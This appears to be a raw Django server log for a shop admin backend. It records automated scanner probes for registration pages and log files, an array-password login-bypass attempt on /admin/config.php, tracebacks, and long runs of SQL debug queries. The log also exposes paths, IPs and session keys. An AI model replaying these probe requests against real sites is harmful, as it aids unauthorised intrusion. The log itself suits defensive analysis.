Not Found: /kaihu.jsp [28/Dec/2019 09:27:17] "GET /kaihu.jsp HTTP/1.0" 404 6338 Not Found: /kaihu.jsp [28/Dec/2019 09:27:17] "GET /kaihu.jsp HTTP/1.0" 404 6338 Not Found: /index.php/index/zhuce [28/Dec/2019 09:27:17] "GET /index.php/index/zhuce HTTP/1.0" 404 6374 Not Found: /index.php/index/zhuce [28/Dec/2019 09:27:17] "GET /index.php/index/zhuce HTTP/1.0" 404 6374 Not Found: /views/html/register.html [28/Dec/2019 09:27:18] "GET /views/html/register.html HTTP/1.0" 404 6383 Not Found: /views/html/register.html [28/Dec/2019 09:27:18] "GET /views/html/register.html HTTP/1.0" 404 6383 Not Found: /myreg.php [28/Dec/2019 09:27:18] "GET /myreg.php HTTP/1.0" 404 6338 Not Found: /myreg.php [28/Dec/2019 09:27:18] "GET /myreg.php HTTP/1.0" 404 6338 DEBUG 2019-12-28 09:27:18,645 utils 2749 140297254205184 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'cl'; args=('cl',) Not Found: /cl/ [28/Dec/2019 09:27:18] "GET /cl/?module=System&method=MAdvertis&other= HTTP/1.0" 404 1767 DEBUG 2019-12-28 09:27:18,794 utils 2749 140297254205184 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'cl'; args=('cl',) Not Found: /cl/ [28/Dec/2019 09:27:18] "GET /cl/?module=System&method=MAdvertis&other= HTTP/1.0" 404 1767 Not Found: /app/member/Regster/ [28/Dec/2019 09:27:18] "GET /app/member/Regster/ HTTP/1.0" 404 6368 Not Found: /app/member/Regster/ [28/Dec/2019 09:27:19] "GET /app/member/Regster/ HTTP/1.0" 404 6368 Not Found: /reg.aspx [28/Dec/2019 09:27:19] "GET /reg.aspx HTTP/1.0" 404 6335 Not Found: /reg.aspx [28/Dec/2019 09:27:19] "GET /reg.aspx HTTP/1.0" 404 6335 Not Found: /reg.php [28/Dec/2019 09:27:19] "GET /reg.php HTTP/1.0" 404 6332 Not Found: /reg.php [28/Dec/2019 09:27:19] "GET /reg.php HTTP/1.0" 404 6332 Not Found: /default.php [28/Dec/2019 09:27:19] "GET /default.php HTTP/1.0" 404 6344 Not Found: /default.php [28/Dec/2019 09:27:19] "GET /default.php HTTP/1.0" 404 6344 [28/Dec/2019 09:27:20] "GET /?c=Register HTTP/1.0" 302 0 DEBUG 2019-12-28 09:27:20,198 utils 2749 140297254205184 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '0lz7deq51yt6l7v6y4roxmwii4yh8r2l' LIMIT 1; args=('0lz7deq51yt6l7v6y4roxmwii4yh8r2l',) DEBUG 2019-12-28 09:27:20,200 utils 2749 140297254205184 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('0lz7deq51yt6l7v6y4roxmwii4yh8r2l', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-11T09:27:20.198872+00:00'::timestamptz); args=('0lz7deq51yt6l7v6y4roxmwii4yh8r2l', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 11, 9, 27, 20, 198872, tzinfo=)) [28/Dec/2019 09:27:20] "GET /login/?next=/%3Fc%3DRegister HTTP/1.0" 200 1812 [28/Dec/2019 09:27:20] "GET /?c=Register HTTP/1.0" 302 0 DEBUG 2019-12-28 09:27:20,448 utils 2749 140297254205184 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'jjoznsyvnnsemtv20ezk7eadkjrhrdm1' LIMIT 1; args=('jjoznsyvnnsemtv20ezk7eadkjrhrdm1',) DEBUG 2019-12-28 09:27:20,450 utils 2749 140297254205184 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('jjoznsyvnnsemtv20ezk7eadkjrhrdm1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-11T09:27:20.448779+00:00'::timestamptz); args=('jjoznsyvnnsemtv20ezk7eadkjrhrdm1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 11, 9, 27, 20, 448779, tzinfo=)) [28/Dec/2019 09:27:20] "GET /login/?next=/%3Fc%3DRegister HTTP/1.0" 200 1812 Not Found: /app/member/register.php [28/Dec/2019 09:27:20] "GET /app/member/register.php HTTP/1.0" 404 6380 Not Found: /app/member/register.php [28/Dec/2019 09:27:20] "GET /app/member/register.php HTTP/1.0" 404 6380 [28/Dec/2019 09:30:07] "GET / HTTP/1.0" 302 0 [28/Dec/2019 09:35:09] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [28/Dec/2019 09:37:24] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /access.log [28/Dec/2019 09:37:25] "GET /access.log HTTP/1.0" 404 6341 [28/Dec/2019 09:40:12] "GET / HTTP/1.0" 302 0 [28/Dec/2019 09:45:17] "GET / HTTP/1.0" 302 0 [28/Dec/2019 09:50:20] "GET / HTTP/1.0" 302 0 [28/Dec/2019 09:56:07] "GET / HTTP/1.0" 302 0 [28/Dec/2019 09:57:55] "GET / HTTP/1.0" 302 0 [28/Dec/2019 10:03:11] "GET / HTTP/1.0" 302 0 [28/Dec/2019 10:08:15] "GET / HTTP/1.0" 302 0 [28/Dec/2019 10:13:18] "GET / HTTP/1.0" 302 0 [28/Dec/2019 10:18:21] "GET / HTTP/1.0" 302 0 [28/Dec/2019 10:23:23] "GET / HTTP/1.0" 302 0 [28/Dec/2019 10:31:16] "GET / HTTP/1.0" 302 0 [28/Dec/2019 10:40:37] "GET / HTTP/1.0" 302 0 [28/Dec/2019 10:45:39] "GET / HTTP/1.0" 302 0 [28/Dec/2019 10:51:23] "GET / HTTP/1.0" 302 0 [28/Dec/2019 10:56:26] "GET / HTTP/1.0" 302 0 [28/Dec/2019 11:05:03] "GET / HTTP/1.0" 302 0 [28/Dec/2019 11:11:02] "GET / HTTP/1.0" 302 0 [28/Dec/2019 11:16:26] "GET / HTTP/1.0" 302 0 [28/Dec/2019 11:21:29] "GET / HTTP/1.0" 302 0 [28/Dec/2019 11:26:32] "GET / HTTP/1.0" 302 0 [28/Dec/2019 11:35:04] "GET / HTTP/1.0" 302 0 [28/Dec/2019 11:40:06] "GET / HTTP/1.0" 302 0 [28/Dec/2019 11:45:09] "GET / HTTP/1.0" 302 0 [28/Dec/2019 11:52:41] "GET / HTTP/1.0" 302 0 [28/Dec/2019 11:57:44] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [28/Dec/2019 11:59:21] "POST /editBlackAndWhiteList HTTP/1.0" 500 63990 [28/Dec/2019 12:05:03] "GET / HTTP/1.0" 302 0 [28/Dec/2019 12:13:14] "GET / HTTP/1.0" 302 0 [28/Dec/2019 12:18:16] "GET / HTTP/1.0" 302 0 [28/Dec/2019 12:26:15] "GET / HTTP/1.0" 302 0 [28/Dec/2019 12:33:39] "GET / HTTP/1.0" 302 0 [28/Dec/2019 12:38:42] "GET / HTTP/1.0" 302 0 [28/Dec/2019 12:41:09] "GET / HTTP/1.0" 302 0 [28/Dec/2019 12:43:45] "GET / HTTP/1.0" 302 0 [28/Dec/2019 12:48:48] "GET / HTTP/1.0" 302 0 [28/Dec/2019 12:54:33] "GET / HTTP/1.0" 302 0 [28/Dec/2019 12:59:36] "GET / HTTP/1.0" 302 0 [28/Dec/2019 13:05:03] "GET / HTTP/1.0" 302 0 [28/Dec/2019 13:10:06] "GET / HTTP/1.0" 302 0 Not Found: /access.log-20191123.gz [28/Dec/2019 13:14:29] "GET /access.log-20191123.gz HTTP/1.0" 404 6377 [28/Dec/2019 13:15:24] "GET / HTTP/1.0" 302 0 [28/Dec/2019 13:20:27] "GET / HTTP/1.0" 302 0 [28/Dec/2019 13:25:30] "GET / HTTP/1.0" 302 0 [28/Dec/2019 13:30:30] "GET / HTTP/1.0" 302 0 [28/Dec/2019 13:35:46] "GET / HTTP/1.0" 302 0 [28/Dec/2019 13:40:30] "GET / HTTP/1.0" 302 0 [28/Dec/2019 13:40:49] "GET / HTTP/1.0" 302 0 [28/Dec/2019 13:45:52] "GET / HTTP/1.0" 302 0 [28/Dec/2019 13:50:59] "GET / HTTP/1.0" 302 0 [28/Dec/2019 13:56:15] "GET / HTTP/1.0" 302 0 [28/Dec/2019 14:05:02] "GET / HTTP/1.0" 302 0 [28/Dec/2019 14:10:05] "GET / HTTP/1.0" 302 0 [28/Dec/2019 14:16:25] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [28/Dec/2019 14:21:12] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /User/User_Favorite.asp [28/Dec/2019 14:21:17] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=210 HTTP/1.0" 404 6422 Not Found: /jyky/Print.asp [28/Dec/2019 14:21:21] "GET /jyky/Print.asp?ArticleID=63 HTTP/1.0" 404 6366 [28/Dec/2019 14:23:11] "GET / HTTP/1.0" 302 0 [28/Dec/2019 14:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [28/Dec/2019 14:28:13] "GET / HTTP/1.0" 302 0 [28/Dec/2019 14:30:17] "GET / HTTP/1.0" 302 0 [28/Dec/2019 14:36:42] "GET / HTTP/1.0" 302 0 [28/Dec/2019 14:41:45] "GET / HTTP/1.0" 302 0 [28/Dec/2019 14:46:48] "GET / HTTP/1.0" 302 0 [28/Dec/2019 14:52:00] "GET / HTTP/1.0" 302 0 [28/Dec/2019 14:57:19] "GET / HTTP/1.0" 302 0 [28/Dec/2019 15:02:53] "GET / HTTP/1.0" 302 0 [28/Dec/2019 15:08:28] "GET / HTTP/1.0" 302 0 [28/Dec/2019 15:13:41] "GET / HTTP/1.0" 302 0 [28/Dec/2019 15:18:58] "GET / HTTP/1.0" 302 0 [28/Dec/2019 15:24:01] "GET / HTTP/1.0" 302 0 [28/Dec/2019 15:29:04] "GET / HTTP/1.0" 302 0 [28/Dec/2019 15:34:07] "GET / HTTP/1.0" 302 0 [28/Dec/2019 15:39:28] "GET / HTTP/1.0" 302 0 [28/Dec/2019 15:44:31] "GET / HTTP/1.0" 302 0 [28/Dec/2019 15:49:34] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 185.61.137.172/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [28/Dec/2019 15:50:39] "POST /editBlackAndWhiteList HTTP/1.0" 500 64009 [28/Dec/2019 15:54:39] "GET / HTTP/1.0" 302 0 [28/Dec/2019 15:59:55] "GET / HTTP/1.0" 302 0 [28/Dec/2019 16:05:02] "GET / HTTP/1.0" 302 0 [28/Dec/2019 16:10:05] "GET / HTTP/1.0" 302 0 [28/Dec/2019 16:15:08] "GET / HTTP/1.0" 302 0 [28/Dec/2019 16:22:39] "GET / HTTP/1.0" 302 0 [28/Dec/2019 16:27:42] "GET / HTTP/1.0" 302 0 [28/Dec/2019 16:27:51] "GET / HTTP/1.0" 302 0 [28/Dec/2019 16:30:02] "GET /whm-server-status HTTP/1.0" 301 0 [28/Dec/2019 16:32:44] "GET / HTTP/1.0" 302 0 [28/Dec/2019 16:41:11] "GET / HTTP/1.0" 302 0 [28/Dec/2019 16:46:14] "GET / HTTP/1.0" 302 0 [28/Dec/2019 16:51:17] "GET / HTTP/1.0" 302 0 [28/Dec/2019 16:56:19] "GET / HTTP/1.0" 302 0 [28/Dec/2019 17:05:03] "GET / HTTP/1.0" 302 0 [28/Dec/2019 17:06:49] "GET / HTTP/1.0" 302 0 [28/Dec/2019 17:10:05] "GET / HTTP/1.0" 302 0 [28/Dec/2019 17:15:08] "GET / HTTP/1.0" 302 0 Not Found: //admin/config.php [28/Dec/2019 17:21:45] "GET //admin/config.php?password%5B0%5D=bebydviyx&username=admin HTTP/1.0" 404 6406 [28/Dec/2019 17:23:03] "GET / HTTP/1.0" 302 0 [28/Dec/2019 17:25:37] "GET / HTTP/1.0" 302 0 [28/Dec/2019 17:28:06] "GET / HTTP/1.0" 302 0 [28/Dec/2019 17:33:09] "GET / HTTP/1.0" 302 0 [28/Dec/2019 17:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [28/Dec/2019 17:38:24] "GET / HTTP/1.0" 302 0 [28/Dec/2019 17:43:41] "GET / HTTP/1.0" 302 0 [28/Dec/2019 17:46:21] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-28 17:46:22,672 utils 2749 140297254205184 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'alwrgpvesrycqadcv002pmfjfbij5bsl' LIMIT 1; args=('alwrgpvesrycqadcv002pmfjfbij5bsl',) DEBUG 2019-12-28 17:46:22,674 utils 2749 140297254205184 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('alwrgpvesrycqadcv002pmfjfbij5bsl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-11T17:46:22.673206+00:00'::timestamptz); args=('alwrgpvesrycqadcv002pmfjfbij5bsl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 11, 17, 46, 22, 673206, tzinfo=)) [28/Dec/2019 17:46:22] "GET /login/?next=/ HTTP/1.0" 200 1786 [28/Dec/2019 17:46:23] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [28/Dec/2019 17:46:23] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [28/Dec/2019 17:46:23] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [28/Dec/2019 17:46:24] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [28/Dec/2019 17:46:28] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [28/Dec/2019 17:46:28] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 Not Found: /favicon.ico [28/Dec/2019 17:46:28] "GET /favicon.ico HTTP/1.0" 404 6346 DEBUG 2019-12-28 17:46:57,268 utils 2749 140297233225472 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-28 17:46:57,277 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-28 17:46:57,282 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-28 17:46:57,284 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-28 17:46:57,288 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-28 17:46:57,290 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-28 17:46:57,292 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-28 17:46:57,294 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-28 17:46:57,296 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-28 17:46:57,300 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-28 17:46:57,302 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-28 17:46:57,304 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-28 17:46:57,306 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-28 17:46:57,309 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-28 17:46:57,312 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-28 17:46:57,314 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-28 17:46:57,316 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-28 17:46:57,318 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-28 17:46:57,321 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-28 17:46:57,324 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-28 17:46:57,327 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-28 17:46:57,329 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-28 17:46:57,331 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-28 17:46:57,333 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-28 17:46:57,335 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-28 17:46:57,338 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-28 17:46:57,341 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-28 17:46:57,343 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-28 17:46:57,345 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-28 17:46:57,347 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-28 17:46:57,350 utils 2749 140297233225472 